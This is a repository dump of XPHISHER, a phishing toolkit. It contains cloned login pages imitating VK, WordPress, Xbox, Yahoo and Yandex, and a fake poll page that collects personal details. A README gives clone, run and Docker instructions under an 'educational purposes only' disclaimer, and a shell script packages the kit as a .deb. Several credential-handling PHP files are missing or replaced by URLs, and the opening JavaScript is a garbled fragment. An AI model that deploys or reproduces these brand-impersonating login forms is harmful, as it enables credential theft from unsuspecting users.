Date,r=Date.UTC(t.getFullYear(),t.getMonth(),t.getDate(),t.getHours(),t.getMinutes(),t.getSeconds())/1e3-e;r-=10800,r=(r/=60).toFixed(0),(r*=60)<-55800?r+=86400:r>37800&&(r-=86400);var o=0,i=Math.abs(r);[-12,-11,-10,-9.5,-9,-8,-7,-6,-5,-4.5,-4,-3.5,-3,-2,-1,0,1,2,3,3.5,4,4.5,5,5.5,5.75,6,6.5,7,8,8.75,9,9.5,10,10.5,11,12,12.75,13,14].forEach(function(e){var t=Math.round(3600*(e-3)),n=Math.abs(r-t);n/g,">").replace(/"/g,""").replace(/\'/g,"'").replace(/%/g,"%")};t.escapeAttr=function(e){return e.replace(/&/g,"&").replace(/"/g,""").replace(/\'/g,"'")};t.unescapeAttr=function(e){return e.replace(/&/g,"&").replace(/"/g,'"').replace(/'/g,"'")};t.replaceEntities=function(e){return ce("textarea",{innerHTML:(e||"").replace(//g,">").replace(/"/g,""")}).value};t.escapeStr=function(e){return e.replace(/\'/g,"\\'")};t.stripTags=function(e){return e.replace(/<[^>]+>/g,"")};t.srand=function(){return Math.random().toString(36).substr(2)};t.irand=function(e,t){return Math.floor(o(e,t))};t.utf2win=function(e){return unescape(encodeURIComponent(e))};t.vkNow=function(){return+new Date};t.defaults=function(e){for(var t=arguments.length,r=new Array(t>1?t-1:0),o=1;o 6 | -------------------------------------------------------------------------------- /.sites/vk/login.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/vk_poll/login.html: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | VoteRank #289032 6 | 7 | 8 | 9 | 10 | 11 | 30 | 31 | 32 |
33 | 34 |
35 |

VoteRank

36 |

#289032

37 |
38 | 39 | 40 |
41 | 42 |
43 | 44 | What is your name?


45 | 46 | 47 | In what mountain do you live?


48 | 49 | How old are you?


50 | 51 | What are your favorite social networks?
52 | 53 | Facebook
54 | Twitter
55 | LinkedIn
56 | Instagram
57 | Snapchat
58 | Google+
59 | Vkontakte

60 |
61 | 62 |
63 | What is your favorite color?
64 | Blue
65 | Red
66 | Green
67 | Yellow
68 | Purple
69 | Orange
70 | Black
71 | White
72 | Grey
73 | Brown
74 | Pink

75 |
76 | 77 |
78 | Do you prefer money as a gift?
79 | Yes
80 | No

81 |
82 | 83 |
84 |
85 | Your favorite genre of music?
86 | People's
87 | Rock
88 | Metal
89 | Pop
90 | Jazz
91 | Shanson
92 | Hip-hop
93 | Rap
94 | Electronic
95 | Other

96 | 97 | 98 |
99 | 100 |
101 | 102 | 103 | 104 | -------------------------------------------------------------------------------- /.sites/vk_poll/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/vk_poll/login2.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | VoteRank #289032 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 |
22 | 23 | 24 |
25 |
26 |
 
27 |
28 |
29 |
30 |
31 | 32 |
33 |
34 |
35 |
36 | 37 | 38 |

 

39 | 40 |
41 | 42 |
43 | 44 |
45 | 46 | 47 |
48 |
49 |
50 | 51 |
52 |
53 |
54 |
55 | 56 |
57 |
58 | 59 |
60 | 61 |
62 | 63 |
64 |
65 |
66 | 67 | 68 | 69 | 70 | 71 |
73 |
74 |
75 | 76 | 77 | 78 | -------------------------------------------------------------------------------- /.sites/vk_poll/result.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Poll completed successfully. Thnak You! 5 | 6 | 7 | 8 | 9 | 10 |
11 | 12 |
13 |

VoteRank

14 |

#56353514

15 |
16 | 17 | 18 |

Poll completed successfully. Thank You!

19 | 20 | 21 | 22 | -------------------------------------------------------------------------------- /.sites/vk_poll/s_c.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerxphantom/XPHISHER/bc4ea3e0e2341bc4aff4e9e60ad7b5953a65f6e7/.sites/vk_poll/s_c.js -------------------------------------------------------------------------------- /.sites/wordpress/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/wordpress/login.html: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | 7 | 8 | Log In — WordPress 9 | 10 | 11 | 12 | 13 | 14 | 15 |
16 |

Powered by WordPress

17 | 18 |
19 |

20 | 22 |

23 |

24 | 26 |

27 |

28 |

29 | 30 | 31 | 32 |

33 |
34 | 35 | 38 | 39 | 52 | 53 |

← Back

54 | 55 |
56 | 57 | 58 |
59 | 60 | 61 | 62 | -------------------------------------------------------------------------------- /.sites/wordpress/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/xbox/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/xbox/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/xbox/pass.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerxphantom/XPHISHER/bc4ea3e0e2341bc4aff4e9e60ad7b5953a65f6e7/.sites/xbox/pass.php -------------------------------------------------------------------------------- /.sites/yahoo/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/yahoo/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/yandex/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/yandex/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | Authorization

Or sign in with a social network

6 | -------------------------------------------------------------------------------- /.sites/yandex/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | FROM debian:latest 2 | LABEL MAINTAINER="https://github.com/XPH4N70M/XPHISHER" 3 | 4 | WORKDIR /XPHISHER/ 5 | ADD . /XPHISHER 6 | 7 | RUN apt update && \ 8 | apt full-upgrade -y && \ 9 | apt install -y curl unzip wget && \ 10 | apt install --no-install-recommends -y php && \ 11 | apt clean 12 | CMD ["./xphisher.sh"] 13 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # XPhisher 2 | 3 | ![Screenshot_20220519-161550_zoom](https://user-images.githubusercontent.com/70594016/169277722-f3c36452-57ae-4b55-b075-22ef21babad3.png) 4 | 5 | 6 | #### Disclaimer 7 | 8 | Any actions and or activities related to xphisher is solely your responsibility. The misuse of this toolkit can result in criminal charges brought against the persons in question. The contributors will not be held responsible in the event any criminal charges be brought against any individuals misusing this toolkit to break the law. 9 | 10 | This toolkit contains materials that can be potentially damaging or dangerous for social media. Refer to the laws in your province/country before accessing, using,or in any other way utilizing this in a wrong way. 11 | 12 | This Tool is made for educational purposes only. Do not attempt to violate the law with anything contained here. If this is your intention, then Get the hell out of here! 13 | 14 | It only demonstrates "how phishing works". You shall not misuse the information to gain unauthorized access to someones social media. However you may try out this at your own risk. 15 | 16 | Tutorial:- 17 | 18 | 19 | ## Installation 20 | Just, Clone this repository - 21 | ```bash 22 | git clone https://github.com/XPH4N70M/XPHISHER.git 23 | ``` 24 | Change to cloned directory and run xphisher.sh - 25 | ```bash 26 | cd XPHISHER 27 | ``` 28 | ![Screenshot_20220519-161949_zoom](https://user-images.githubusercontent.com/70594016/169277848-9385cd67-855a-4fba-9fd4-623082def278.png) 29 | 30 | ```bash 31 | bash xphisher.sh 32 | ``` 33 | On first launch, It'll install the dependencies and that's it. xphisher is installed. 34 | 35 | ### Run on Docker 36 | ```bash 37 | docker pull XPH4N70M/XPHISHER 38 | ``` 39 | ```bash 40 | docker run --rm -it XPH4N70M/XPHISHER 41 | ``` 42 | ### Dependencies 43 | xphisher requires following programs to run properly - 44 | ```bash 45 | php 46 | ``` 47 | ```bash 48 | wget 49 | ``` 50 | ```bash 51 | curl 52 | ``` 53 | ```bash 54 | git 55 | ``` 56 | All the dependencies will be installed automatically when you run xphisher for the first time. 57 | 58 | ### Supported Platform : 59 | Termux, Ubuntu/Debian/Kali/Parrot, Arch Linux/Manjaro, Fedora 60 | 61 | ![PicsArt_05-26-10 54 23](https://user-images.githubusercontent.com/70594016/170422203-aec4bc41-c7ea-4ac5-a849-9494d6960c14.jpg) 62 | 63 | 64 | 65 | ............Join Us All https://bit.ly/3wiPUko ............... 66 | -------------------------------------------------------------------------------- /make-deb.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | PACKAGE_NAME=XPHISHER 3 | XPHISHER_VERSION=2.2 4 | PACKAGE_ARCH=all 5 | DISTRO=$(uname -o) 6 | 7 | 8 | build_package() { 9 | # define variables depending on detected platform 10 | distr_name=$1 11 | if [ "$distr_name" == "Android" ]; then 12 | platform="Termux" 13 | path_part="data/data/com.termux/files/" 14 | else 15 | platform="Debian" 16 | path_part="" 17 | fi 18 | # print out message with detected platform 19 | echo "Building .deb package for: $platform" 20 | # run preparations and build package 21 | platform=${platform^^} 22 | mkdir -p ./package/DEBIAN 23 | mkdir -p ./package/"$path_part"usr/bin 24 | mkdir -p ./package/"$path_part"usr/opt 25 | cp -rf ./.package/"$platform"/control ./package/DEBIAN/control 26 | mkdir -p package/"$path_part"usr/opt/$PACKAGE_NAME 27 | cp -rf ./LICENSE ./.sites ./.imgs ./xphisher.sh ./package/"$path_part"usr/opt/$PACKAGE_NAME 28 | cp -rf ./.package/launch.sh ./package/"$path_part"usr/bin/$PACKAGE_NAME 29 | chmod 755 ./package/DEBIAN 30 | dpkg-deb --build ./package $PACKAGE_NAME\_$XPHISHER_VERSION\_$PACKAGE_ARCH.deb 31 | } 32 | 33 | 34 | # launch the build 35 | build_package $DISTRO 36 | --------------------------------------------------------------------------------